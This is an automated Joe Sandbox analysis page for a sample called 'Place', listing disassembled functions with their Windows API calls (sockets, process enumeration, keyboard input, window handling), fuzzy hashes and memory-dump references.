Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 708212d69e881f847d8f887ea866ccd3d8759559343eea650638caca9b089afe
Instruction ID: c53585a1774616341b362397ae25bfbff2cc627c854c6accf4b03105c911743e
Opcode Fuzzy Hash: 708212d69e881f847d8f887ea866ccd3d8759559343eea650638caca9b089afe
Instruction Fuzzy Hash: 06814B75A00109EFCF14CF98C884EEEBBB9FF89315F14459AE506AB250DB71AE05CB60

Function 005D749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005D74AC
SysAllocString.OLEAUT32(00000000), ref: 005D7555
VariantCopy.OLEAUT32 ref: 005D7584
VariantClear.OLEAUT32(?), ref: 005D75AB

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: b053baa870417b3cb980ec4de2f1cad964f85789a36497132015637677c03e2c
Instruction ID: ed28f6a24a2e25071290484b1d1786be1e939c3cee8c6c2a34347053a2eb0047
Opcode Fuzzy Hash: b053baa870417b3cb980ec4de2f1cad964f85789a36497132015637677c03e2c
Instruction Fuzzy Hash: BA51833460870A9ADB30AF7D9899A2DBFA5BF49310B20981FE556D7791FA70D840C705

Function 005FF4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 005FF526
Process32FirstW.KERNEL32(00000000,?), ref: 005FF534

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

Process32NextW.KERNEL32(00000000,?), ref: 005FF5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 005FF603

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: d58b328993c178a12060d660a037eef1096e94299c09be13abc5c3c0254f1676
Instruction ID: f86e08c82b3b9f208ddb5b26f7fb0cc80c17d08cfe77f31bd50e95eb2b13f77c
Opcode Fuzzy Hash: d58b328993c178a12060d660a037eef1096e94299c09be13abc5c3c0254f1676
Instruction Fuzzy Hash: DA517C71104712AFD710EF20D88AA6BBBE8FF94710F40492DF995972A1EB70E904CB92

Function 005A492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005A49C0
__flush.LIBCMT ref: 005A49E0
__write.LIBCMT ref: 005A4A13
__flsbuf.LIBCMT ref: 005A4A41

Part of subcall function 005A8D58: __getptd_noexit.LIBCMT ref: 005A8D58

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: 208929672c6dbea2dbec92e00c1e42fe7091d15a8db22a14ad5df24ed4206811
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: 0A41B5316007069FDF288EE9C8949AF7FA6BFC6360B24853DE855C7650E7B09D508F44

Function 005DA638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 005DA68A
__itow.LIBCMT ref: 005DA6BB

Part of subcall function 005DA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 005DA976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 005DA724
__itow.LIBCMT ref: 005DA77B

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 9e23b703e0d48e3c4879c3a49e0b9b857ff8e6517c57b251b8b9413a85a85a4e
Instruction ID: cae4e025f04a22720bf714e1141770c93649d5f231bbb232636f86c1e828fd26
Opcode Fuzzy Hash: 9e23b703e0d48e3c4879c3a49e0b9b857ff8e6517c57b251b8b9413a85a85a4e
Instruction Fuzzy Hash: BB416274A0021AABDF21EF64C859BEF7FB9FF84750F04001AF905A3391DB709944CAA6

Function 005F7095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 005F70BC
WSAGetLastError.WSOCK32(00000000), ref: 005F70CC

Part of subcall function 00584D37: __itow.LIBCMT ref: 00584D62
Part of subcall function 00584D37: __swprintf.LIBCMT ref: 00584DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 005F7130
WSAGetLastError.WSOCK32(00000000), ref: 005F713C

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 8cc78cf5e986d966a1e271337e51bd83bd9c5f73e116442b32bc2d4b295545d0
Instruction ID: ecc29115534d1c3a6af63184d61d4b6ac0738d55cca56d1ebb15338eafe7d5c6
Opcode Fuzzy Hash: 8cc78cf5e986d966a1e271337e51bd83bd9c5f73e116442b32bc2d4b295545d0
Instruction Fuzzy Hash: EB41B4756042066FEB20BF64DC8AF7A7BA4EB44B14F048458FE15AB3D2EB749C008B90

Function 005F6B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00610980), ref: 005F6B92
_strlen.LIBCMT ref: 005F6BC4

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 2f718b5128fb8738f42c3f2208a6da6444d4d4565e54f389bfc135599b3c2204
Instruction ID: d88c351420ae8e361211c8314199ec73894dd203d7a54c1572fa01d4392b9d42
Opcode Fuzzy Hash: 2f718b5128fb8738f42c3f2208a6da6444d4d4565e54f389bfc135599b3c2204
Instruction Fuzzy Hash: 0B41C67160010EAFCB14FBA4CC99EBEBBA9FF94310F148155F95A97292EB34AD41CB50

Function 00608E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00608F03

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: a97b251d20975dfd2ca1dfe412527df14188737f61e2c09b380c336886542d49
Instruction ID: 02bddac8f9c6ae35ebb08ea0e627c11d19fb4f8998108b5e17bd5a4342dfd7e0
Opcode Fuzzy Hash: a97b251d20975dfd2ca1dfe412527df14188737f61e2c09b380c336886542d49
Instruction Fuzzy Hash: A331C53468011AEEEF28DA24CC45BEA3BA7EB06390F144512FA91D72E1CFB0E9508B51

Function 0060B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0060B1D2
GetWindowRect.USER32(?,?), ref: 0060B248
PtInRect.USER32(?,?,0060C6BC), ref: 0060B258
MessageBeep.USER32(00000000), ref: 0060B2C9

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: fd3fe538bd45f284f20d17e34e3ca8c9f021a78f88719bd1c6a57d7a2647f793
Instruction ID: 69d464974cbf715e33c744e70a9db81d918b0acad9dad0ebc81881b7d16a4444
Opcode Fuzzy Hash: fd3fe538bd45f284f20d17e34e3ca8c9f021a78f88719bd1c6a57d7a2647f793
Instruction Fuzzy Hash: AA416C34A44115DFDB19DF98C884AAE7BF6FF49310F18D4A9E8189B395D730AA41CF90

Function 005E12D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 005E1326
SetKeyboardState.USER32(00000080,?,00000001), ref: 005E1342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 005E13A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 005E13FA

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: d6f4162a1aa80901892b62cf3c68648ecac508b871b1bc0f1ae866134ae467b0
Instruction ID: 387b5eab276b16acb0c0b9ecd1a68fcfac4d55453cef23ff79e5652cc7eeb9f7
Opcode Fuzzy Hash: d6f4162a1aa80901892b62cf3c68648ecac508b871b1bc0f1ae866134ae467b0
Instruction Fuzzy Hash: 8F314F70940A98AEFF3987278C05BFE7F66BB48310F08471AE4D1525D1D3744D919B59

Function 005E1410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 005E1465
SetKeyboardState.USER32(00000080,?,00008000), ref: 005E1481
PostMessageW.USER32(00000000,00000101,00000000), ref: 005E14E0
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 005E1532

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 1f28ee944a0cf854105cf348ddefd24955269a39aa3d7de3caedc2744b638939
Instruction ID: b1b2d926bf4c55c95468d84332b44857f1cf26c8f9a9a7f02b4bf3ed033130c3
Opcode Fuzzy Hash: 1f28ee944a0cf854105cf348ddefd24955269a39aa3d7de3caedc2744b638939
Instruction Fuzzy Hash: 90316E70940A995EFF3C8B679C04BFEBF66BB85310F08431BE4C1522D1C37489818B69

Function 005B63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005B642B
__isleadbyte_l.LIBCMT ref: 005B6459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005B6487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005B64BD

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 6f2497e7656ba0234bf82a42d81fdfdef2356cf2a215b7cb2db814e542db4331
Instruction ID: 662a0c6d1ad3b6283c585f591f457c19fac8cfea5edd4bea6f60f8fac1158234
Opcode Fuzzy Hash: 6f2497e7656ba0234bf82a42d81fdfdef2356cf2a215b7cb2db814e542db4331
Instruction Fuzzy Hash: 7631AF31600A56AFDF258F65CC89AEA7FA5FF41320F254429F86487191EB39F850DB50

Function 0060552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0060553F

Part of subcall function 005E3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005E3B4E
Part of subcall function 005E3B34: GetCurrentThreadId.KERNEL32 ref: 005E3B55
Part of subcall function 005E3B34: AttachThreadInput.USER32(00000000,?,005E55C0), ref: 005E3B5C

GetCaretPos.USER32(?), ref: 00605550
ClientToScreen.USER32(00000000,?), ref: 0060558B
GetForegroundWindow.USER32 ref: 00605591

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: b1802db999bcc93d0f5dd091bfa0541901da88ce8c6d0335aa978de9de5dcb4c
Instruction ID: 718e24f14536145cf62388250357cf070b30bcd7e46ebc68295c018114375c4d
Opcode Fuzzy Hash: b1802db999bcc93d0f5dd091bfa0541901da88ce8c6d0335aa978de9de5dcb4c
Instruction Fuzzy Hash: 7A312171900109AFDB04EFA5C8859EFBBFDEF98304F10446AE915E7241EA75AE418FA0

Function 0060CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005829E2: GetWindowLongW.USER32(?,000000EB), ref: 005829F3

GetCursorPos.USER32(?), ref: 0060CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,005BBCEC,?,?,?,?,?), ref: 0060CB8F
GetCursorPos.USER32(?), ref: 0060CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,005BBCEC,?,?,?), ref: 0060CC16

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 3b2e4951f96a6fa46eef67e36343eef7f8078c5cf15d281567c36c96e68fec8b
Instruction ID: 299e25a8ac2d9ea6643625f3ab1f586e758f0d3527c5ef0d36a7f20984bc1983
Opcode Fuzzy Hash: 3b2e4951f96a6fa46eef67e36343eef7f8078c5cf15d281567c36c96e68fec8b
Instruction Fuzzy Hash: 8D31BF38640018AFCB198F58C849EFB7BB7EB49320F0481A9F905973A1C7319D51EFA0

Function 005A0BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 005A0BE2

Part of subcall function 0059402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,005E7E51,?,?,00000000), ref: 00594041
Part of subcall function 0059402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,005E7E51,?,?,00000000,?,?), ref: 00594065

_fprintf.LIBCMT ref: 005A0C19
OutputDebugStringW.KERNEL32(?), ref: 005D694C

Part of subcall function 005A4CCA: _flsall.LIBCMT ref: 005A4CE3

__setmode.LIBCMT ref: 005A0C4E

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 7181d4c738dc6297efb0cf1b3c76b956889d3be49e2bb66d8e5a475210c6078d
Instruction ID: 0ecdcf586e1a0c9dee2cbff8adb966165c59838d3fac06990b5b583b9752503a
Opcode Fuzzy Hash: 7181d4c738dc6297efb0cf1b3c76b956889d3be49e2bb66d8e5a475210c6078d
Instruction Fuzzy Hash: AD1127319041066ECB08B7A49C5E9BEBF6DFFC2320F140516F204572C2EFB15D528BA1

Function 005D9274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005D8D3F
Part of subcall function 005D8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005D8D49
Part of subcall function 005D8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005D8D58
Part of subcall function 005D8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005D8D5F
Part of subcall function 005D8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005D8D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005D92C1
_memcmp.LIBCMT ref: 005D92E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005D931A
HeapFree.KERNEL32(00000000), ref: 005D9321

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 5baae8c6b04ae10d1eba71f6ae30071e2c199718e2bc9360a31eb484346d0c3e
Instruction ID: 983133741539a567132e23eb2b532a312ada91071eef3f0907846d749ac6e69d
Opcode Fuzzy Hash: 5baae8c6b04ae10d1eba71f6ae30071e2c199718e2bc9360a31eb484346d0c3e
Instruction Fuzzy Hash: 45218E31E41109AFDB24DFA8C945BEEBBB8FF44301F14445BE844A7391D770AA44CB90

Function 0060634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 006063BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 006063D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 006063E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 006063F3

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: d36b0c738e8f12c5c04a9806c519b13db9e240d92d2e7d87132b502289cccbb4
Instruction ID: ce5a3b09902d39ada7113029f193819bdc54af044963e0e7117468a8a0bb4bb7
Opcode Fuzzy Hash: d36b0c738e8f12c5c04a9806c519b13db9e240d92d2e7d87132b502289cccbb4
Instruction Fuzzy Hash: C611D231341415AFDB08AB14DC49FBB7BAAEF85320F145119F916D72D1CBB0AD018BD0

Function 005DE45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 005DF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,005DE46F,?,?,?,005DF262,00000000,000000EF,00000119,?,?), ref: 005DF867
Part of subcall function 005DF858: lstrcpyW.KERNEL32(00000000,?,?,005DE46F,?,?,?,005DF262,00000000,000000EF,00000119,?,?,00000000), ref: 005DF88D
Part of subcall function 005DF858: lstrcmpiW.KERNEL32(00000000,?,005DE46F,?,?,?,005DF262,00000000,000000EF,00000119,?,?), ref: 005DF8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,005DF262,00000000,000000EF,00000119,?,?,00000000), ref: 005DE488
lstrcpyW.KERNEL32(00000000,?,?,005DF262,00000000,000000EF,00000119,?,?,00000000), ref: 005DE4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,005DF262,00000000,000000EF,00000119,?,?,00000000), ref: 005DE4E2

Strings

cdecl, xrefs: 005DE4D9

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

